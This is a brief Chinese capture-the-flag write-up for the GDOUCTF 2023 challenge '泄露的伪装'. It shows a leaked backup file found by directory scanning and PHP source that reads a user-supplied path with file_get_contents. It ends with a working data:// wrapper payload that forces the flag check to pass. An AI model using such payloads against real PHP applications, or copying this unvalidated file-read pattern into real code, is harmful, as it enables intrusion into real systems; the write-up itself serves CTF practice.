[GDOUCTF 2023]泄露的伪装

dirsearch 扫描发现www.rar ，得到gift /orzorz.php

<?php
error_reporting(0);
if(isset($_GET['cxk'])){
    $cxk=$_GET['cxk'];
    if(file_get_contents($cxk)=="ctrl"){
        echo $flag;
    }else{
        echo "洗洗睡吧";
    }
}else{
    echo "nononoononoonono";
}
?>

exp:?cxk=data://text/plain,ctrl